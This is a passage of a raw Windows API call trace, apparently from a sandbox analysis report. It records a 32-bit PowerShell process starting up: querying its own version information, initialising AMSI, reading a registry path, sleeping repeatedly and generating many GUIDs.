"c:\\windows\\syswow64\\windowspowershell\\v1.0\\powershell.exe"), fInfoLevelId=0x0, lpFileInformation=0x755f688 | out: lpFileInformation=0x755f688*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9fdc1d0a, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x9fdc1d0a, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x9fdc1d0a, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x69000)) returned 1 [0130.695] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x755f608) returned 1 [0130.695] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe", lpdwHandle=0x755f6fc | out: lpdwHandle=0x755f6fc) returned 0x72c [0130.695] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe", dwHandle=0x0, dwLen=0x72c, lpData=0x511b55c | out: lpData=0x511b55c) returned 1 [0130.695] VerQueryValueW (in: pBlock=0x511b55c, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x755f6d0, puLen=0x755f6cc | out: lplpBuffer=0x755f6d0*=0x511b8ec, puLen=0x755f6cc) returned 1 [0130.695] VerQueryValueW (in: pBlock=0x511b55c, lpSubBlock="\\\\StringFileInfo\\\\040904B0\\\\CompanyName", lplpBuffer=0x755f650, puLen=0x755f64c | out: lplpBuffer=0x755f650*=0x511b614, puLen=0x755f64c) returned 1 [0130.695] VerQueryValueW (in: pBlock=0x511b55c, lpSubBlock="\\\\StringFileInfo\\\\040904B0\\\\FileDescription", lplpBuffer=0x755f650, puLen=0x755f64c | out: lplpBuffer=0x755f650*=0x511b668, puLen=0x755f64c) returned 1 [0130.695] VerQueryValueW (in: pBlock=0x511b55c, lpSubBlock="\\\\StringFileInfo\\\\040904B0\\\\FileVersion", lplpBuffer=0x755f650, puLen=0x755f64c | out: lplpBuffer=0x755f650*=0x511b6b0, puLen=0x755f64c) returned 1 [0130.695] VerQueryValueW (in: pBlock=0x511b55c, lpSubBlock="\\\\StringFileInfo\\\\040904B0\\\\InternalName", lplpBuffer=0x755f650, puLen=0x755f64c | out: lplpBuffer=0x755f650*=0x511b718, puLen=0x755f64c) returned 1 [0130.696] VerQueryValueW (in: pBlock=0x511b55c, lpSubBlock="\\\\StringFileInfo\\\\040904B0\\\\LegalCopyright", lplpBuffer=0x755f650, puLen=0x755f64c | out: lplpBuffer=0x755f650*=0x511b754, puLen=0x755f64c) returned 1 [0130.696] VerQueryValueW (in: pBlock=0x511b55c, lpSubBlock="\\\\StringFileInfo\\\\040904B0\\\\OriginalFilename", lplpBuffer=0x755f650, puLen=0x755f64c | out: lplpBuffer=0x755f650*=0x511b7d8, puLen=0x755f64c) returned 1 [0130.696] VerQueryValueW (in: pBlock=0x511b55c, lpSubBlock="\\\\StringFileInfo\\\\040904B0\\\\ProductName", lplpBuffer=0x755f650, puLen=0x755f64c | out: lplpBuffer=0x755f650*=0x511b820, puLen=0x755f64c) returned 1 [0130.696] VerQueryValueW (in: pBlock=0x511b55c, lpSubBlock="\\\\StringFileInfo\\\\040904B0\\\\ProductVersion", lplpBuffer=0x755f650, puLen=0x755f64c | out: lplpBuffer=0x755f650*=0x511b890, puLen=0x755f64c) returned 1 [0130.696] VerQueryValueW (in: pBlock=0x511b55c, lpSubBlock="\\\\StringFileInfo\\\\040904B0\\\\Comments", lplpBuffer=0x755f650, puLen=0x755f64c | out: lplpBuffer=0x755f650*=0x0, puLen=0x755f64c) returned 0 [0130.696] VerQueryValueW (in: pBlock=0x511b55c, lpSubBlock="\\\\StringFileInfo\\\\040904B0\\\\LegalTrademarks", lplpBuffer=0x755f650, puLen=0x755f64c | out: lplpBuffer=0x755f650*=0x0, puLen=0x755f64c) returned 0 [0130.696] VerQueryValueW (in: pBlock=0x511b55c, lpSubBlock="\\\\StringFileInfo\\\\040904B0\\\\PrivateBuild", lplpBuffer=0x755f650, puLen=0x755f64c | out: lplpBuffer=0x755f650*=0x0, puLen=0x755f64c) returned 0 [0130.696] VerQueryValueW (in: pBlock=0x511b55c, lpSubBlock="\\\\StringFileInfo\\\\040904B0\\\\SpecialBuild", lplpBuffer=0x755f650, puLen=0x755f64c | out: lplpBuffer=0x755f650*=0x0, puLen=0x755f64c) returned 0 [0130.696] VerQueryValueW (in: pBlock=0x511b55c, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x755f644, puLen=0x755f640 | out: lplpBuffer=0x755f644*=0x511b8ec, puLen=0x755f640) returned 1 [0130.696] VerLanguageNameW (in: wLang=0x409, szLang=0x755f3d4, cchLang=0x100 | out: szLang="English (United States)") returned 0x17 [0130.696] VerQueryValueW (in: pBlock=0x511b55c, lpSubBlock="\\", lplpBuffer=0x755f654, puLen=0x755f650 | out: lplpBuffer=0x755f654*=0x511b584, puLen=0x755f650) returned 1 [0130.717] AmsiInitialize () returned 0x0 [0134.815] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x755ede0, nSize=0x80 | out: lpBuffer="⚴ؒ뛍ꡏ玦ݕݕ\x01") returned 0x0 [0135.133] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x755ede0, nSize=0x80 | out: lpBuffer="က灗˳") returned 0x0 [0140.214] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0140.308] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0140.395] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0140.499] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0140.589] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0140.675] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0140.838] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0141.101] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0141.192] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0141.277] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0141.372] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0141.497] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0141.581] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0141.673] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0141.761] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0141.841] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0141.929] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0142.172] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0142.249] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0142.334] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0142.427] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0142.514] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0142.728] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\3\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x755f4fc | out: phkResult=0x755f4fc*=0x6ac) returned 0x0 [0142.731] RegQueryValueExW (in: hKey=0x6ac, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x755f51c, lpData=0x0, lpcbData=0x755f518*=0x0 | out: lpType=0x755f51c*=0x1, lpData=0x0, lpcbData=0x755f518*=0x56) returned 0x0 [0142.731] RegQueryValueExW (in: hKey=0x6ac, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x755f51c, lpData=0x51e654c, lpcbData=0x755f518*=0x56 | out: lpType=0x755f51c*=0x1, lpData="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", lpcbData=0x755f518*=0x56) returned 0x0 [0142.732] RegCloseKey (hKey=0x6ac) returned 0x0 [0143.545] GetTimeZoneInformation (in: lpTimeZoneInformation=0x755f2cc | out: lpTimeZoneInformation=0x755f2cc) returned 0x1 [0143.548] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x755eb40, nSize=0x80 | out: lpBuffer="က永က永") returned 0x0 [0143.549] CoCreateGuid (in: pguid=0x755f394 | out: pguid=0x755f394*(Data1=0xdcee6311, Data2=0xe5e9, Data3=0x47b4, Data4=([0]=0xab, [1]=0xd4, [2]=0x8b, [3]=0x1b, [4]=0xdd, [5]=0x84, [6]=0xa1, [7]=0x2))) returned 0x0 [0143.597] CoCreateGuid (in: pguid=0x755f394 | out: pguid=0x755f394*(Data1=0x63894670, Data2=0x8cd0, Data3=0x4603, Data4=([0]=0x80, [1]=0xca, [2]=0x6f, [3]=0x51, [4]=0xb4, [5]=0x31, [6]=0xd5, [7]=0x7b))) returned 0x0 [0143.712] CoCreateGuid (in: pguid=0x755f394 | out: pguid=0x755f394*(Data1=0xade0a08e, Data2=0x2330, Data3=0x4ade, Data4=([0]=0x8c, [1]=0x95, [2]=0xe4, [3]=0x48, [4]=0x58, [5]=0x62, [6]=0x73, [7]=0xf5))) returned 0x0 [0143.714] CoCreateGuid (in: pguid=0x755f394 | out: pguid=0x755f394*(Data1=0x8cbbe737, Data2=0x6a54, Data3=0x45f6, Data4=([0]=0x9e, [1]=0xec, [2]=0x4f, [3]=0xc7, [4]=0x5e, [5]=0x5, [6]=0x88, [7]=0x8a))) returned 0x0 [0143.718] CoCreateGuid (in: pguid=0x755f394 | out: pguid=0x755f394*(Data1=0x1948b018, Data2=0x9d77, Data3=0x4c9b, Data4=([0]=0x83, [1]=0x68, [2]=0x18, [3]=0x43, [4]=0x89, [5]=0xc5, [6]=0xee, [7]=0xeb))) returned 0x0 [0143.719] CoCreateGuid (in: pguid=0x755f394 | out: pguid=0x755f394*(Data1=0x86aa55ad, Data2=0x4a31, Data3=0x493d, Data4=([0]=0x99, [1]=0x7a, [2]=0x3c, [3]=0x93, [4]=0xee, [5]=0x82, [6]=0x18, [7]=0x81))) returned 0x0 [0143.724] CoCreateGuid (in: pguid=0x755f394 | out: pguid=0x755f394*(Data1=0x260e4a83, Data2=0x89aa, Data3=0x4c4f, Data4=([0]=0x95, [1]=0x90, [2]=0xa6, [3]=0x50, [4]=0xe7, [5]=0xb6, [6]=0x2d, [7]=0xa0))) returned 0x0 [0143.733] CoCreateGuid (in: pguid=0x755f394 | out: pguid=0x755f394*(Data1=0xe43487cc, Data2=0xec4, Data3=0x4580, Data4=([0]=0xba, [1]=0xb9, [2]=0xed, [3]=0xaa, [4]=0xc2, [5]=0x8a, [6]=0x87, [7]=0x4a))) returned 0x0 [0143.739] CoCreateGuid (in: pguid=0x755f394 | out: pguid=0x755f394*(Data1=0xd8c9541e, Data2=0x24d, Data3=0x445f, Data4=([0]=0x9d, [1]=0xe8, [2]=0x88, [3]=0x56, [4]=0x60, [5]=0x1c, [6]=0xe0, [7]=0xcf))) returned 0x0 [0143.740] CoCreateGuid (in: pguid=0x755f394 | out: pguid=0x755f394*(Data1=0xaa18eec5, Data2=0x94d2, Data3=0x457b, Data4=([0]=0xa8, [1]=0xf1, [2]=0xc2, [3]=0xfc, [4]=0xe7, [5]=0x1a, [6]=0x0, [7]=0x5f))) returned 0x0 [0143.744] CoCreateGuid (in: pguid=0x755f394 | out: pguid=0x755f394*(Data1=0x4892181f, Data2=0xb7cf, Data3=0x4dcc, Data4=([0]=0x86, [1]=0x37, [2]=0xd9, [3]=0x9, [4]=0xac, [5]=0x67, [6]=0x59, [7]=0xa9))) returned 0x0 [0143.749] CoCreateGuid (in: pguid=0x755f394 | out: pguid=0x755f394*(Data1=0xe2f58738, Data2=0x1a20, Data3=0x430c, Data4=([0]=0x88, [1]=0x8a, [2]=0x99, [3]=0xaf, [4]=0x75, [5]=0x25, [6]=0x44, [7]=0xb8))) returned 0x0 [0143.895] CoCreateGuid (in: pguid=0x755f394 | out: pguid=0x755f394*(Data1=0x23f6f392, Data2=0x831c, Data3=0x4dd6, Data4=([0]=0x87, [1]=0xfc, [2]=0x78, [3]=0x7b, [4]=0xa6, [5]=0xa4, [6]=0x96, [7]=0x78))) returned 0x0 [0143.895] CoCreateGuid (in: pguid=0x755f394 | out: pguid=0x755f394*(Data1=0x798fcd1, Data2=0x17f0, Data3=0x4e2c, Data4=([0]=0x87, [1]=0x7e, [2]=0xa9, [3]=0xe8, [4]=0x16, [5]=0x3e, [6]=0xc8, [7]=0x7a))) returned 0x0 [0143.901] CoCreateGuid (in: pguid=0x755f394 | out: pguid=0x755f394*(Data1=0x9a7dcd2a, Data2=0x3ca9, Data3=0x49b7, Data4=([0]=0xb3, [1]=0x9f, [2]=0xe4, [3]=0x4b, [4]=0x90, [5]=0xdf, [6]=0xd7, [7]=0xa2))) returned 0x0 [0143.901] CoCreateGuid (in: pguid=0x755f394 | out: pguid=0x755f394*(Data1=0x9b32bbf, Data2=0x9d11, Data3=0x4941, Data4=([0]=0xb9, [1]=0x44, [2]=0x3e, [3]=0x65, [4]=0x8e, [5]=0x1e, [6]=0xe8, [7]=0x60))) returned 0x0 [0143.908] CoCreateGuid (in: pguid=0x755f394 | out: pguid=0x755f394*(Data1=0x665ac71, Data2=0xdabd, Data3=0x4d22, Data4=([0]=0xb7, [1]=0x1f, [2]=0xfb, [3]=0x3f, [4]=0xd3, [5]=0x49, [6]=0x41, [7]=0x49))) returned 0x0 [0143.909] CoCreateGuid (in: pguid=0x755f394 | out: pguid=0x755f394*(Data1=0x46714cef, Data2=0x9433, Data3=0x411c, Data4=([0]=0x9f, [1]=0xbd, [2]=0xc7, [3]=0x99, [4]=0x32, [5]=0x28, [6]=0x7e, [7]=0xc0))) returned 0x0 [0143.915] CoCreateGuid (in: pguid=0x755f394 | out: pguid=0x755f394*(Data1=0x36a456f7, Data2=0x6b2e, Data3=0x4e05, Data4=([0]=0xae, [1]=0xc8, [2]=0x28, [3]=0x75, [4]=0xfd, [5]=0x29, [6]=0x83, [7]=0xb1))) returned 0x0 [0143.918] CoCreateGuid (in: pguid=0x755f394 | out: pguid=0x755f394*(Data1=0x64571484, Data2=0x2193, Data3=0x4c02, Data4=([0]=0x97, [1]=0x28, [2]=0x77, [3]=0xae, [4]=0x1, [5]=0x83, [6]=0xa2, [7]=0x70))) returned 0x0 [0143.922] CoCreateGuid (in: pguid=0x755f394 | out: pguid=0x755f394*(Data1=0x19261ce9, Data2=0x9ffd, Data3=0x40c4, Data4=([0]=0xbb, [1]=0x7e, [2]=0x5, [3]=0xf2, [4]=0xe7, [5]=0x5e, [6]=0xe6, [7]=0xa6))) returned 0x0 [0143.922] CoCreateGuid (in: pguid=0x755f394 | out: pguid=0x755f394*(Data1=0xc0648a5a, Data2=0xcaa1, Data3=0x4321, Data4=([0]=0xa4, [1]=0x9d, [2]=0xce, [3]=0xc0, [4]=0x38, [5]=0x7d, [6]=0x9a, [7]=0xf))) returned 0x0 [0143.927] CoCreateGuid (in: pguid=0x755f394 | out: pguid=0x755f394*(Data1=0xc35442cb, Data2=0x5f97, Data3=0x4df5, Data4=([0]=0x9e, [1]=0x28, [2]=0xe7, [3]=0xc7, [4]=0x6e, [5]=0xb9, [6]=0x53, [7]=0x20))) returned 0x0 [0143.933] CoCreateGuid (in: pguid=0x755f394 | out: pguid=0x755f394*(Data1=0x1c9ab98c, Data2=0x90d4, Data3=0x47b6, Data4=([0]=0x92, [1]=0x82, [2]=0x2d, [3]=0xba, [4]=0x72, [5]=0x73, [6]=0x59, [7]=0x19))) returned 0x0 [0143.933] CoCreateGuid (in: pguid=0x755f394 | out: pguid=0x755f394*(Data1=0x82d61929, Data2=0xe22d, Data3=0x4a09, Data4=([0]=0xa8, [1]=0xda, [2]=0x12, [3]=0x61, [4]=0x54, [5]=0x36, [6]=0xf1, [7]=0x5a))) returned 0x0 [0143.934] CoCreateGuid (in: pguid=0x755f394 | out: pguid=0x755f394*(Data1=0x2b65835c, Data2=0xf4e4, Data3=0x48bc, Data4=([0]=0xbf, [1]=0xae, [2]=0xcc, [3]=0xbe, [4]=0x5e, [5]=0xd1, [6]=0x3, [7]=0xbc))) returned 0x0 [0143.934] CoCreateGuid (in: pguid=0x755f394 | out: pguid=0x755f394*(Data1=0x4fbb7e7e, Data2=0xc99c, Data3=0x4df9, Data4=([0]=0xbd, [1]=0x5, [2]=0x12, [3]=0x1a, [4]=0x56, [5]=0x5e, [6]=0x7f, [7]=0x9b))) returned 0x0 [0143.938] CoCreateGuid (in: pguid=0x755f394 | out: pguid=0x755f394*(Data1=0x95da3a88, Data2=0xd358, Data3=0x41a5, Data4=([0]=0x81, [1]=0x11, [2]=0xde, [3]=0x88, [4]=0xce, [5]=0x17, [6]=0xfc, [7]=0xb0))) returned 0x0 [0143.990] CoCreateGuid (in: pguid=0x755f394 | out: pguid=0x755f394*(Data1=0x6901eeb0, Data2=0xf434, Data3=0x4a29, Data4=([0]=0x88, [1]=0xc3, [2]=0x74, [3]=0x92, [4]=0x4e, [5]=0xbe, [6]=0x65, [7]=0x42))) returned 0x0 [0143.996] CoCreateGuid (in: pguid=0x755f394 | out: pguid=0x755f394*(Data1=0x2ba0e201, Data2=0x883d, Data3=0x4eea, Data4=([0]=0x8a, [1]=0x38, [2]=0x54, [3]=0xe8, [4]=0xad, [5]=0x75, [6]=0x29, [7]=0xc9))) returned 0x0 [0143.996] CoCreateGuid (in: pguid=0x755f394 | out: pguid=0x755f394*(Data1=0x183af82b, Data2=0xf215, Data3=0x4625, Data4=([0]=0xbb, [1]=0x8b, [2]=0xd8, [3]=0xdc, [4]=0x43, [5]=0x8, [6]=0xff, [7]=0x56))) returned 0x0 [0144.001] CoCreateGuid (in: pguid=0x755f394 | out: pguid=0x755f394*(Data1=0xa397eed7, Data2=0x4d82, Data3=0x4571, Data4=([0]=0xa2, [1]=0x28, [2]=0x81, [3]=0xa3, [4]=0xc5, [5]=0xb3, [6]=0x15, [7]=0xad))) returned 0x0 [0144.001] CoCreateGuid (in: pguid=0x755f394 | out: pguid=0x755f394*(Data1=0xf20b9dfe, Data2=0x8991, Data3=0x475f, Data4=([0]=0xbd, [1]=0x48, [2]=0x81, [3]=0x14, [4]=0xca, [5]=0xbd, [6]=0xb0, [7]=0xb8))) returned 0x0 [0144.008] CoCreateGuid (in: pguid=0x755f394 | out: pguid=0x755f394*(Data1=0xe6a4fc2f, Data2=0x6d38, Data3=0x46bd, Data4=([0]=0xb1, [1]=0xcd, [2]=0x1e, [3]=0xac, [4]=0xb9, [5]=0x17, [6]=0xf3, [7]=0x85))) returned 0x0 [0144.009] CoCreateGuid (in: pguid=0x755f394 | out: pguid=0x755f394*(Data1=0x83f1e354, Data2=0x2839, Data3=0x424f, Data4=([0]=0x86, [1]=0x46, [2]=0xa3, [3]=0x66, [4]=0x4a, [5]=0x8d, [6]=0x95, [7]=0xe0))) returned 0x0 [0144.009] CoCreateGuid (in: pguid=0x755f394 | out: pguid=0x755f394*(Data1=0x64aef5db, Data2=0xfea2, Data3=0x4205, Data4=([0]=0x89, [1]=0x1e, [2]=0xcc, [3]=0x83, [4]=0x18, [5]=0x3d, [6]=0xd5, [7]=0x8c))) returned 0x0 [0144.014] CoCreateGuid (in: pguid=0x755f394 | out: pguid=0x755f394*(Data1=0x79a597bb, Data2=0x4eec, Data3=0x4d08, Data4=([0]=0x9d, [1]=0xf5, [2]=0x2c, [3]=0xd4, [4]=0xd5, [5]=0xb4, [6]=0xd6, [7]=0x25))) returned 0x0 [0144.019] CoCreateGuid (in: pguid=0x755f394 | out: pguid=0x755f394*(Data1=0xb0c3f65f, Data2=0x6c6e, Data3=0x4c35, Data4=([0]=0xa2, [1]=0xe6, [2]=0xc6, [3]=0xcd, [4]=0xf7, [5]=0x81, [6]=0xcd, [7]=0x21))) returned 0x0 [0144.024] CoCreateGuid (in: pguid=0x755f394 | out: pguid=0x755f394*(Data1=0xd26d8749, Data2=0x25cc, Data3=0x44e2, Data4=([0]=0xaa, [1]=0x9, [2]=0xdd, [3]=0xbb, [4]=0xfc, [5]=0xb0, [6]=0xef, [7]=0x6a))) returned 0x0 [0144.024] CoCreateGuid (in: pguid=0x755f394 | out: pguid=0x755f394*(Data1=0x7bb74b6e, Data2=0x878f, Data3=0x48c8, Data4=([0]=0x98, [1]=0xdc, [2]=0xee, [3]=0x78, [4]=0x96, [5]=0x5d, [6]=0xa3, [7]=0x9d))) returned 0x0 [0144.029] CoCreateGuid (in: pguid=0x755f394 | out: pguid=0x755f394*(Data1=0xb4edae2e, Data2=0x8b9c, Data3=0x4677, Data4=([0]=0x8e, [1]=0xf8, [2]=0xff, [3]=0x1, [4]=0xcc, [5]=0xdd, [6]=0x82, [7]=0x2d))) returned 0x0 [0144.034] CoCreateGuid (in: pguid=0x755f394 | out: pguid=0x755f394*(Data1=0xf6d05cc8, Data2=0x8025, Data3=0x4905, Data4=([0]=0x87, [1]=0x2e, [2]=0x29, [3]=0x45, [4]=0x13, [5]=0x57, [6]=0xb9, [7]=0xa2))) returned 0x0 [0144.120] CoCreateGuid (in: pguid=0x755f394 | out: pguid=0x755f394*(Data1=0x35fbcc62, Data2=0x2599, Data3=0x4aed, Data4=([0]=0xb7, [1]=0x62, [2]=0x61, [3]=0x15, [4]=0xa1, [5]=0xf6, [6]=0xe3, [7]=0x4))) returned 0x0 [0144.125] CoCreateGuid (in: pguid=0x755f394 | out: pguid=0x755f394*(Data1=0xa409f984, Data2=0x962f, Data3=0x4b7c, Data4=([0]=0xb8, [1]=0xfc, [2]=0xdb, [3]=0xab, [4]=0x3f, [5]=0xc7, [6]=0x20, [7]=0x45))) returned 0x0 [0144.131] CoCreateGuid (in: pguid=0x755f394 | out: pguid=0x755f394*(Data1=0xe7ba629e, Data2=0x59a8, Data3=0x41c7, Data4=([0]=0x85, [1]=0xa2, [2]=0xd, [3]=0x4c, [4]=0x21, [5]=0x73, [6]=0x1e, [7]=0xaf))) returned 0x0 [0144.137] CoCreateGuid (in: pguid=0x755f394 | out: pguid=0x755f394*(Data1=0x20d2b813, Data2=0x3ff5, Data3=0x4732, Data4=([0]=0xb0, [1]=0x68, [2]=0xc4, [3]=0x75, [4]=0x5c, [5]=0x29, [6]=0x44, [7]=0xc8))) returned 0x0 [0144.142] CoCreateGuid (in: pguid=0x755f394 | out: pguid=0x755f394*(Data1=0x5feacf92, Data2=0x4b73, Data3=0x4f88, Data4=([0]=0xaf, [1]=0x42, [2]=0x3d, [3]=0xcc, [4]=0x2d, [5]=0xa6, [6]=0xc9, [7]=0x9))) returned 0x0 [0144.254] CoCreateGuid (in: pguid=0x755f394 | out: pguid=0x755f394*(Data1=0x2574a1b9, Data2=0x91ce, Data3=0x483e, Data4=([0]=0xaa, [1]=0x80, [2]=0x96, [3]=0xda, [4]=0x15, [5]=0x15, [6]=0x9a, [7]=0xd9))) returned 0x0 [0144.419] CoCreateGuid (in: pguid=0x755f394 | out: pguid=0x755f394*(Data1=0x21c4a4f0, Data2=0x78d1, Data3=0x45b8, Data4=([0]=0x88, [1]=0xef, [2]=0x52, [3]=0x65, [4]=0xc0, [5]=0xa4, [6]=0xf9, [7]=0xad))) returned 0x0 [0144.423] CoCreateGuid (in: pguid=0x755f394 | out: pguid=0x755f394*(Data1=0x81fa28b8, Data2=0x1f09, Data3=0x4868, Data4=([0]=0xa1, [1]=0x20, [2]=0xf3, [3]=0x63, [4]=0x70, [5]=0x81, [6]=0x9f, [7]=0xe1))) returned 0x0 [0144.429] CoCreateGuid (in: pguid=0x755f394 | out: pguid=0x755f394*(Data1=0xa2ae248d, Data2=0xa5b9, Data3=0x4271, Data4=([0]=0x93, [1]=0x70, [2]=0x64, [3]=0xac, [4]=0xec, [5]=0xa8, [6]=0xf2, [7]=0x58))) returned 0x0 [0144.434] CoCreateGuid (in: pguid=0x755f394 | out: pguid=0x755f394*(Data1=0x37b54e42, Data2=0x8660, Data3=0x4226, Data4=([0]=0x87, [1]=0xec, [2]=0xb4, [3]=0x17, [4]=0xcf, [5]=0x0, [6]=0x50, [7]=0x2a))) returned 0x0 [0144.439] CoCreateGuid (in: pguid=0x755f394 | out: pguid=0x755f394*(Data1=0xe793ef85, Data2=0x83e2, Data3=0x46fd, Data4=([0]=0xb1, [1]=0x37, [2]=0x5a, [3]=0x5d, [4]=0xdc, [5]=0x13, [6]=0x46, [7]=0x98))) returned 0x0 [0144.447] CoCreateGuid (in: pguid=0x755f394 | out: pguid=0x755f394*(Data1=0xf20b25ae, Data2=0xc0a5, Data3=0x4673, Data4=([0]=0xa3, [1]=0xbc, [2]=0x27, [3]=0xd5, [4]=0xe8, [5]=0x6, [6]=0x7d, [7]=0xc5))) returned 0x0 [0144.452] CoCreateGuid (in: pguid=0x755f394 | out: pguid=0x755f394*(Data1=0x640f417f, Data2=0xabef, Data3=0x4341, Data4=([0]=0x9a, [1]=0x68, [2]=0x7e, [3]=0x20, [4]=0x28, [5]=0x24, [6]=0xea, [7]=0x41))) returned 0x0 [0144.456] CoCreateGuid (in: pguid=0x755f394 | out: pguid=0x755f394*(Data1=0xb92f343a, Data2=0x2128, Data3=0x454c, Data4=([0]=0x99, [1]=0x45, [2]=0x70, [3]=0xa8, [4]=0xc7, [5]=0x27, [6]=0xdd, [7]=0xb1))) returned 0x0 [0144.640] CoCreateGuid (in: pguid=0x755f394 | out: pguid=0x755f394*(Data1=0xffeef429, Data2=0x97e2, Data3=0x41d6, Data4=([0]=0xb7, [1]=0x14, [2]=0xfb, [3]=0xa1, [4]=0xcb, [5]=0xa9, [6]=0x86, [7]=0xda))) returned 0x0 [0144.645] CoCreateGuid (in: pguid=0x755f394 | out: pguid=0x755f394*(Data1=0xb92ae85e, Data2=0xf6c0, Data3=0x48c4, Data4=([0]=0xaf, [1]=0x68, [2]=0x9f, [3]=0x9, [4]=0x43, [5]=0xbd, [6]=0xe6, [7]=0x6))) returned 0x0 [0144.650] CoCreateGuid (in: pguid=0x755f394 | out: pguid=0x755f394*(Data1=0x2b3df103, Data2=0x37be, Data3=0x4172, Data4=([0]=0xa7, [1]=0x3b, [2]=0x80, [3]=0xce, [4]=0x25, [5]=0x12, [6]=0x9c, [7]=0xc8))) returned 0x0 [0144.658] CoCreateGuid (in: pguid=0x755f394 | out: pguid=0x755f394*(Data1=0xb823f015, Data2=0xa1cc, Data3=0x424b, Data4=([0]=0xb1, [1]=0x76, [2]=0xe5, [3]=0x92, [4]=0xb9, [5]=0xe, [6]=0x2e, [7]=0x85))) returned 0x0 [0144.665] CoCreateGuid (in: pguid=0x755f394 | out: pguid=0x755f394*(Data1=0xf25c747e, Data2=0x1e23, Data3=0x4bd6, Data4=([0]=0x8b, [1]=0xf1, [2]=0xc8, [3]=0x2a, [4]=0x25, [5]=0x46, [6]=0xb5, [7]=0xe3))) returned 0x0 [0144.670] CoCreateGuid (in: pguid=0x755f394 | out: pguid=0x755f394*(Data1=0x8bd53d8b, Data2=0xe153, Data3=0x458e, Data4=([0]=0xbb, [1]=0x6d, [2]=0x25, [3]=0x1b, [4]=0x1f, [5]=0x36, [6]=0xb0, [7]=0x28))) returned 0x0 [0144.673] CoCreateGuid (in: pguid=0x755f394 | out: pguid=0x755f394*(Data1=0x17b39cc5, Data2=0xe4bb, Data3=0x499d, Data4=([0]=0xb1, [1]=0xda, [2]=0x60, [3]=0x23, [4]=0xd6, [5]=0x6a, [6]=0xe3, [7]=0x88))) returned 0x0 [0144.812] CoCreateGuid (in: pguid=0x755f394 | out: pguid=0x755f394*(Data1=0x3c45416a, Data2=0xc96f, Data3=0x4f27, Data4=([0]=0xaf, [1]=0x76, [2]=0x5a, [3]=0x2e, [4]=0x51, [5]=0x8e, [6]=0xbc, [7]=0xab))) returned 0x0 [0144.815] CoCreateGuid (in: pguid=0x755f394 | out: pguid=0x755f394*(Data1=0xbc225838, Data2=0xd5aa, Data3=0x4de7, Data4=([0]=0xa0, [1]=0xa0, [2]=0x26, [3]=0x14, [4]=0x5c, [5]=0xfa, [6]=0xeb, [7]=0xea))) returned 0x0 [0144.821] CoCreateGuid (in: pguid=0x755f394 | out: pguid=0x755f394*(Data1=0x9e5e295b, Data2=0x1b79, Data3=0x44a4, Data4=([0]=0x82, [1]=0x9b, [2]=0xc3, [3]=0xc1, [4]=0x2d, [5]=0x2, [6]=0x38, [7]=0xdd))) returned 0x0 [0144.827] CoCreateGuid (in: pguid=0x755f394 | out: pguid=0x755f394*(Data1=0x17ce0c21, Data2=0xe0cb, Data3=0x4766, Data4=([0]=0x82, [1]=0xf1, [2]=0x69, [3]=0xae, [4]=0xe9, [5]=0xc, [6]=0x5a, [7]=0xcb))) returned 0x0 [0144.834] CoCreateGuid (in: pguid=0x755f394 | out: pguid=0x755f394*(Data1=0x84e564a5, Data2=0xbb8f, Data3=0x4524, Data4=([0]=0xbc, [1]=0xfa, [2]=0xd5, [3]=0x5b, [4]=0x89, [5]=0x2, [6]=0xcd, [7]=0xd8))) returned 0x0 [0144.839] CoCreateGuid (in: pguid=0x755f394 | out: pguid=0x755f394*(Data1=0xaa1e56c9, Data2=0x99f, Data3=0x406f, Data4=([0]=0x97, [1]=0xd, [2]=0x8a, [3]=0x47, [4]=0xcf, [5]=0x30, [6]=0xf2, [7]=0x45))) returned 0x0 [0144.841] CoCreateGuid (in: pguid=0x755f394 | out: pguid=0x755f394*(Data1=0x213ca617, Data2=0xe2c4, Data3=0x4048, Data4=([0]=0x9f, [1]=0x95, [2]=0x3e, [3]=0x21, [4]=0xd8, [5]=0x47, [6]=0x40, [7]=0xab))) returned 0x0 [0144.847] CoCreateGuid (in: 